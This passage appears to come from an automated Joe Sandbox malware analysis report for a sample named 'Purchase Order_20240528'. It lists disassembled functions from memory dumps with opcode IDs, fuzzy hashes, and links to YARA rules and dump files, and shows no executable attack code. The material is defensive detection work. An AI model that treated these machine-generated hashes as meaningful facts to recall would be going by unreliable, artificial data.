                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c502e1d5621d902c811cc274e83d292f937faeb28a40df0d436b3eb8dfe8da3
                                  • Instruction ID: 198b5a683d6809a957edab80619489ddc2e65ff799756f4feb79baa0ac701f95
                                  • Opcode Fuzzy Hash: 6c502e1d5621d902c811cc274e83d292f937faeb28a40df0d436b3eb8dfe8da3
                                  • Instruction Fuzzy Hash: 2731B772E00625AFDB22DFA9CD40BAFBBF9EF48750F014865E555D7290D3759E008BA0
                                  Function 016A60B8 Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54885614ae7f23dc3cfd4f3b7386cdf1575f40dd64a0546f1ae4208ee6f7cce2
                                  • Instruction ID: fc9e9d0f25aa133d1dcc142d0416036e62192a417da3bebb23e9ab6149fc7879
                                  • Opcode Fuzzy Hash: 54885614ae7f23dc3cfd4f3b7386cdf1575f40dd64a0546f1ae4208ee6f7cce2
                                  • Instruction Fuzzy Hash: 6A31D471A40606AFDB129FADCC50B6ABBBABF44754F45006DE606DB342DB70EC018F90
                                  Function 015E07AF Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 564e52821af7cc422ccba78e2dbb8eaded8328702bddf3aa7fba8c7e9ce0e996
                                  • Instruction ID: 35a05351f62bcf54fb9275bacb32c9d150714b66df22388c886b40cd25bf7ea1
                                  • Opcode Fuzzy Hash: 564e52821af7cc422ccba78e2dbb8eaded8328702bddf3aa7fba8c7e9ce0e996
                                  • Instruction Fuzzy Hash: 4931B372F08612DBC716DE688894A6BBBE5BFD4250F014929FD55AF290DA70DC0187E1
                                  Function 015E8550 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c62c7d12e10096a1c216e4c576190e5e26bf9f3b741449599b2e3b61cd6bffb
                                  • Instruction ID: 06ce5b8d82c5d73814d1ce331682e27d421a3e29278eb9e17fb52289da110947
                                  • Opcode Fuzzy Hash: 5c62c7d12e10096a1c216e4c576190e5e26bf9f3b741449599b2e3b61cd6bffb
                                  • Instruction Fuzzy Hash: 3A31A171A053019FE324CF19D844B6BBBE5FB88B00F1449AEF9849B351D770E844CB91
                                  Function 0161A6C7 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction ID: 36564cf11735adeebf8a1820c3a6bba113fb8ea29d0b96df19e4ea5bac73ec16
                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction Fuzzy Hash: 98312CB6B01B41AFD761CFA9DD40B67BBF8BB08650F08092DA59AC3750E730E900CB64
                                  Function 0160438F Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eb16469cc4ba9ef6696615decc0ced58cb99f634c9e96cc0c3cc038b887223b
                                  • Instruction ID: 880ee11d2cd87382b3caabe191c330a82805c2ecc901dd8f20259430ef65510f
                                  • Opcode Fuzzy Hash: 3eb16469cc4ba9ef6696615decc0ced58cb99f634c9e96cc0c3cc038b887223b
                                  • Instruction Fuzzy Hash: C131C232B012469FD729DFA9CD81A6FBBFAEF84304F018529D615D7294DB30E941CB91
                                  Function 015DCB7E Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction ID: edd7250839850f39d4332894a99352b3c257b6bef76abf3e4e764da159c45e63
                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction Fuzzy Hash: C9210932E0125BAAEB119BB9C801BAFBBB5FF54740F0585799E55EB340E370D900C7A0
                                  Function 015DC156 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d615ae332c265e919585c4bcba0528d208dd265f63e8741d3fba0cac8c18a42a
                                  • Instruction ID: cffbed7a135932a1c7c8b64ad5faa206c28e2db5238ebf865ee471e2e27d9357
                                  • Opcode Fuzzy Hash: d615ae332c265e919585c4bcba0528d208dd265f63e8741d3fba0cac8c18a42a
                                  • Instruction Fuzzy Hash: 553149B19002118BDB32AF68CC44B7977B4BFC5304F9481ADD9459F382EB74D986CB90
                                  Function 0169C3CD Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction ID: 02d6c8f971d40203d2b0e5e10199f0acb637c0797cc78224bb627ab1ff9c3b94
                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction Fuzzy Hash: 6C212D3670065267DF15AB958C00ABEBBB9EF40B10F40801EFA558B691E734D940C7B4
                                  Function 015DE420 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cdee37df40c445b248f94d99f90f804ab2529010390feccd83d593016845b802
                                  • Instruction ID: 6bf3faa4e4a8a8a104cca312502110aa089431c3c60d05a5baf9d436b10212d7
                                  • Opcode Fuzzy Hash: cdee37df40c445b248f94d99f90f804ab2529010390feccd83d593016845b802
                                  • Instruction Fuzzy Hash: 8531C231A015299BDB319E1CCC42FEE77B9FB55780F0105A5E645AF290E6749E808FA0
                                  Function 01614588 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction ID: 957f0e3d40f6f22f6a218db4084672fd41c2498c0feb3f9715e8f6eae6dabdc4
                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction Fuzzy Hash: A8216031A00719EBCB15CF68C980A8EBBA5FF48758F14C469EE159F245DB71EA05CB90
                                  Function 016144B0 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46ad760ad209874034690f2a277ee8a5d85103bbab4545149e8331b44c0fc43b
                                  • Instruction ID: 2520af614ade53428b5305c747475d5f580eb9ef185d03d69d84079092b85fa6
                                  • Opcode Fuzzy Hash: 46ad760ad209874034690f2a277ee8a5d85103bbab4545149e8331b44c0fc43b
                                  • Instruction Fuzzy Hash: 9521BF726087469BCB22CF58CC80B6B77E5FB88760F058529FD549B785DB30E901CBA2
                                  Function 015DE388 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction ID: 3e2360fcfc169f0176dd57c96900835b8355058500e442c93df2229db990c574
                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction Fuzzy Hash: DA316831600605AFEB21CBA8C885F6AB7F9FF85354F1449A9E552CF290E730EA42CB50
                                  Function 0165E609 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3488069ad64830ea3061085996231ecbebdc08940b1c0cce3570aff4b26c89d6
                                  • Instruction ID: 1e94dfacb2c05c1ec16f3a24f685015fbe48898d713fc595a9aefd3845c8f1c8
                                  • Opcode Fuzzy Hash: 3488069ad64830ea3061085996231ecbebdc08940b1c0cce3570aff4b26c89d6
                                  • Instruction Fuzzy Hash: 2E317E75A002169FCF54CF1CCC849AEBBB5EF84344F16445AEC099B391EB32EA51CBA5
                                  Function 016606F1 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d032c8c9b524f4717f2d4c8640726c1d111e68c038fee9e4e593c9e7e6b5dd83
                                  • Instruction ID: 51610f26e40b53a41939c5536209cf844bb259710b442c41e4ae2d7d06d0948d
                                  • Opcode Fuzzy Hash: d032c8c9b524f4717f2d4c8640726c1d111e68c038fee9e4e593c9e7e6b5dd83
                                  • Instruction Fuzzy Hash: 4F217E71E0062A9BCF249F59CC81ABEBBF8FF48740B510069F541AB240D778AD51CBA1
                                  Function 0166019F Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1c1f2a31b7f8100d28743c49eeca2a8132d3c913ebcb0a063822236a7b220d8
                                  • Instruction ID: 2e7b01be42ce2302523ceccb3834efb89b0640597e9bce08bcfc861155a85cdb
                                  • Opcode Fuzzy Hash: e1c1f2a31b7f8100d28743c49eeca2a8132d3c913ebcb0a063822236a7b220d8
                                  • Instruction Fuzzy Hash: 69217A71A00645ABD7159BA8DC40A6AB7A8FF88740F144069FA04DB790D738ED40CB68
                                  Function 01660283 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fffcc579ad12fa8698d2ef5ec3c85e4803939596a66928568ac6bad0055c8d41
                                  • Instruction ID: 62b541cefe23b11669e5aaf061733afddcf8aa6625e62487a8976394f23b0c6a
                                  • Opcode Fuzzy Hash: fffcc579ad12fa8698d2ef5ec3c85e4803939596a66928568ac6bad0055c8d41
                                  • Instruction Fuzzy Hash: CD21AF729042469BE712EF59CD44B6BBBDCBF90240F08486ABA80DB291D734D905C6A2
                                  Function 01602835 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bab468a110cbe56b4ae487745d9a937da2fd4029ee90d8965491413693612566
                                  • Instruction ID: 498faee9809bfafb719eec331edb7fd66e4d0cc31e4ecef8969861d4fa1ecbe4
                                  • Opcode Fuzzy Hash: bab468a110cbe56b4ae487745d9a937da2fd4029ee90d8965491413693612566
                                  • Instruction Fuzzy Hash: C4213B32744682ABF327576C8D18B253B95BF41770F2903A8FA619F7D2DB68C801C210
                                  Function 0161A30B Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec52f65c7407265528c54e2237af7650e775e75c3b4316f45e0b0abc120481f6
                                  • Instruction ID: fdb453fb10183ce433d938c6f8da96b99c2843d7c78792e79d9d37cc88764774
                                  • Opcode Fuzzy Hash: ec52f65c7407265528c54e2237af7650e775e75c3b4316f45e0b0abc120481f6
                                  • Instruction Fuzzy Hash: 9921AC35641A429FCB25DF69CC01B56B7F5BF48708F14846CE51ACBB61E331E842CB94
                                  Function 0169A49A Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e5205fab5aa6ab363f10c9832553f48b69ae405fff7cc78d95a583561e50533
                                  • Instruction ID: a224db33eb588717c2e302d87fd585a4244130d6cf671b9a74506371e55539df
                                  • Opcode Fuzzy Hash: 0e5205fab5aa6ab363f10c9832553f48b69ae405fff7cc78d95a583561e50533
                                  • Instruction Fuzzy Hash: 2111E372380A12BFEB2256999C41F277ADEDBD4B60F110468B758DB280EF70DC018795
                                  Function 01660946 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df74158901dffb3b448531e54025577babb1c033fcfc670b408ced4dab5d7861
                                  • Instruction ID: 0bfd9ab8b8bc62aa03d72339fb6cb0e2488f36c8d8f6385198ca1afd0e43195d
                                  • Opcode Fuzzy Hash: df74158901dffb3b448531e54025577babb1c033fcfc670b408ced4dab5d7861
                                  • Instruction Fuzzy Hash: 2C21E6B1E41259ABCB24DFAAD9809AEFBF9FF98610F10012EE405A7340DB709941CF54
                                  Function 016780A8 Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction ID: cfe50b5608cb16fe0904a9aca9e563f917fddcde698436db9ffff605c7b06707
                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction Fuzzy Hash: 22216A72A0020AAFDF129F98CC44BAEBBBAFF88311F214859F914A7251D734DD51CB50
                                  Function 01610124 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction ID: 4c083f76ebf16436be14daf8af5c21a6e76170da8ec5241dcd1735e199f80ba7
                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction Fuzzy Hash: 87113433600605BFDB228F98CD42F9ABBB9EB80755F140069F6008F280D774ED80CB50
                                  Function 015E8770 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0bfe0765e16f353854dc7feb884266c1578df22770f569e41bc4ac8fc287b370
                                  • Instruction ID: c17e6d3db4c4831b9fc9f2de6ab0d3886f332deb1bb2b9561c026842812143a3
                                  • Opcode Fuzzy Hash: 0bfe0765e16f353854dc7feb884266c1578df22770f569e41bc4ac8fc287b370
                                  • Instruction Fuzzy Hash: 9F11C135F406119BDB19CF4DC4C4A2ABBE9BF8A710B1980ADEE099F205D6B2D901C790
                                  Function 0161AAEE Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
